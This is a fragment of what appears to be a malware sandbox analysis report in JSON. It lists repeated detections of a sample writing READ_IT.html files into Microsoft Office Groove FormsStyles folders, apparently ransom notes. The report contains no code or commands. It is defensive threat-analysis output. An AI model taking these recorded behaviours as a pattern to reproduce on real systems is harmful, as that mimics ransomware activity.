{ "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22647", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22917", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23031", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23049", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23067", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23081", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23095", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23105", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23119", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23129", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23143", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23157", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23171", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23189", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23199", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23217", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23227", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23489", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23603", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23621", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23639", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23653", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23667", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23677", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23691", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23701", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23715", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23729", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program 